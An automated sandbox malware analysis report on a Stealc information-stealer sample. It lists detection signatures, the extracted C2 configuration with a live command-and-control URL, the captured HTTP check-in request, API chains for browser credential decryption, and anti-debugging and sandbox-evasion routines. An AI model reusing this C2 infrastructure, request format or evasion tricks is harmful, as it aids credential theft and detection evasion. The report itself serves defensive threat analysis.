
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1528566
MD5: a5d18ff9a3069cd251170021b5a0da87
SHA1: 2bf3ebe6be6c5a2892335cee98d6e338506458d0
SHA256: 5ec5e0e9c3636bbf6380c00672bf9c8fb36ec1aef7095cc051243ad8830ca23a
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6996 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A5D18FF9A3069CD251170021B5A0DA87)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |
00000000.00000002.1312008954.00000000019DE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.1268244294.00000000055E0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 6996 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 6996 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0.2.file.exe.c30000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T02:10:03.429876+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49700 | 185.215.113.37 | 80 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.c30000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: file.exe | ReversingLabs: Detection: 44%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C39AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C37240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C39B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C48EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C44910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C44570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C43EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49700 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IJEHCGIJECFIECBFIDGD
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 34 35 32 42 31 34 32 30 38 42 32 37 36 38 32 33 36 36 34 33 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 2d 2d 0d 0a
    Data Ascii: ------IJEHCGIJECFIECBFIDGDContent-Disposition: form-data; name="hwid"FC452B14208B2768236643------IJEHCGIJECFIECBFIDGDContent-Disposition: form-data; name="build"doma------IJEHCGIJECFIECBFIDGD--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C36280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IJEHCGIJECFIECBFIDGD
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 34 35 32 42 31 34 32 30 38 42 32 37 36 38 32 33 36 36 34 33 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 2d 2d 0d 0a
    Data Ascii: ------IJEHCGIJECFIECBFIDGDContent-Disposition: form-data; name="hwid"FC452B14208B2768236643------IJEHCGIJECFIECBFIDGDContent-Disposition: form-data; name="build"doma------IJEHCGIJECFIECBFIDGD--
Source: file.exe, 00000000.00000002.1312008954.00000000019DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&
Source: file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php2
Source: file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpB
Source: file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpD
Source: file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpWindows
Source: file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpj
Source: file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7D8F3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100303F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FFB9B6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010008C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010A0B00
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01004337
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0109FBC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF6A10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC63E7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FCACD1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FFD4AF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF84AA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FE7C6F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01007478
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F9FD86
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FFED71
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB9D7F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC8559
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7A52D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F936FE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF4EF2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBA670
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF9F14
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00C345C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: iobnflrc ZLIB complexity 0.9950398838512677
Source: file.exe, 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1268244294.00000000055E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C48680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C43720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\8WKA33ZC.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 44%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1811968 > 1048576
Source: file.exe | Static PE information: Raw size of iobnflrc is bigger than: 0x100000 < 0x194400

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.c30000.0.unpack :EW;.rsrc :W;.idata :W; :EW;iobnflrc:EW;wmcwbjql:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;iobnflrc:EW;wmcwbjql:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c383e should be: 0x1bc65d
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: iobnflrc
Source: file.exe | Static PE information: section name: wmcwbjql
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7D8F3 push 1F85631Dh; mov dword ptr [esp], edi (0_2_00F7D91F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7D8F3 push 29E8C224h; mov dword ptr [esp], ecx (0_2_00F7D93F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7D8F3 push ecx; mov dword ptr [esp], 347E4400h (0_2_00F7D9D8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7D8F3 push 106E71FAh; mov dword ptr [esp], ecx (0_2_00F7DA1C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7D8F3 push ebx; mov dword ptr [esp], ecx (0_2_00F7DA51)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7D8F3 push edx; mov dword ptr [esp], ecx (0_2_00F7DAA7)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7D8F3 push 2C3A27B4h; mov dword ptr [esp], eax (0_2_00F7DAD9)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F7D8F3 push edx; mov dword ptr [esp], 7C611043h (0_2_00F7DAEF)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107591A push ebp; mov dword ptr [esp], esp (0_2_01075956)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107591A push edi; mov dword ptr [esp], ebx (0_2_01075994)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107591A push edx; mov dword ptr [esp], ebp (0_2_010759B3)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107591A push 3A42E8B0h; mov dword ptr [esp], ebx (0_2_010759D3)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010A512D push edx; mov dword ptr [esp], edi (0_2_010A51DF)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0102492B push edi; mov dword ptr [esp], edx (0_2_010249BF)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010AF126 push eax; mov dword ptr [esp], ecx (0_2_010AF16A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107613E push ebx; mov dword ptr [esp], 737F9D55h (0_2_01076171)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107613E push 466C34BEh; mov dword ptr [esp], eax (0_2_010761BD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107613E push 2304F14Dh; mov dword ptr [esp], edx (0_2_0107621B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010D0154 push 33B43508h; mov dword ptr [esp], ebp (0_2_010D0198)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010C496C push 6AE3FDC8h; mov dword ptr [esp], esi (0_2_010C4B0C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0102E96F push 40AA7A5Ah; mov dword ptr [esp], edx (0_2_0102E9DB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01023172 push ebp; mov dword ptr [esp], ecx (0_2_01023191)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01023172 push edi; mov dword ptr [esp], esi (0_2_0102320F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111396C push 55323F00h; mov dword ptr [esp], eax (0_2_01113993)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0103A995 push eax; mov dword ptr [esp], 7B888394h (0_2_0103A9E0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107C9A7 push ecx; mov dword ptr [esp], 01EA5E69h (0_2_0107C9F4)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010609EC push 4067DDF3h; mov dword ptr [esp], esp (0_2_01060A00)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010609EC push edx; mov dword ptr [esp], 6EFB6871h (0_2_01060F6B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010609EC push ebp; mov dword ptr [esp], ebx (0_2_010611C6)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C4B035 push ecx; ret (0_2_00C4B048)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010989F7 push ebp; mov dword ptr [esp], 4DC2865Ah (0_2_010994DF)
Source: file.exe | Static PE information: section name: iobnflrc entropy: 7.954448270760046

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13542)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100D0F4 second address: 100D10D instructions:
    0x00000000 rdtsc
    0x00000002 push eax
    0x00000003 push edx
    0x00000004 jmp 00007F8114E11BEFh
    0x00000009 jo 00007F8114E11BE6h
    0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100C18C second address: 100C1B5 instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 jbe 00007F8114B92466h
    0x0000000a jl 00007F8114B92466h
    0x00000010 popad
    0x00000011 pushad
    0x00000012 jmp 00007F8114B92473h
    0x00000017 push eax
    0x00000018 pop eax
    0x00000019 push eax
    0x0000001a push edx
    0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100C4B5 second address: 100C4C0 instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 pushad
    0x00000005 popad
    0x00000006 pop esi
    0x00000007 push eax
    0x00000008 push edx
    0x00000009 push eax
    0x0000000a push edx
    0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100C4C0 second address: 100C4C6 instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 push eax
    0x00000005 push edx
    0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100C4C6 second address: 100C4CA instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100C4CA second address: 100C4CE instructions:
    0x00000000 rdtsc
    0x00000002 push eax
    0x00000003 push edx
    0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100C651 second address: 100C657 instructions:
    0x00000000 rdtsc
    0x00000002 push eax
    0x00000003 push edx
    0x00000004 pushad
    0x00000005 popad
    0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100C657 second address: 100C664 instructions:
    0x00000000 rdtsc
    0x00000002 push eax
    0x00000003 pop eax
    0x00000004 pop edx
    0x00000005 pop eax
    0x00000006 pop edx
    0x00000007 pop eax
    0x00000008 push eax
    0x00000009 push edx
    0x0000000a pushad
    0x0000000b push eax
    0x0000000c push edx
    0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100C664 second address: 100C687 instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 push esi
    0x00000005 pop esi
    0x00000006 jng 00007F8114E11BE6h
    0x0000000c popad
    0x0000000d jmp 00007F8114E11BF6h
    0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100C687 second address: 100C69B instructions:
    0x00000000 rdtsc
    0x00000002 jp 00007F8114B92476h
    0x00000008 jmp 00007F8114B9246Ah
    0x0000000d push eax
    0x0000000e push edx
    0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100C7CE second address: 100C81F instructions:
    0x00000000 rdtsc
    0x00000002 jmp 00007F8114E11BF1h
    0x00000007 pop edx
    0x00000008 pop eax
    0x00000009 jc 00007F8114E11C26h
    0x0000000f push edx
    0x00000010 jmp 00007F8114E11BF7h
    0x00000015 pop edx
    0x00000016 push eax
    0x00000017 push edx
    0x00000018 jmp 00007F8114E11BF5h
    0x0000001d jg 00007F8114E11BE6h
    0x00000023 rdtsc
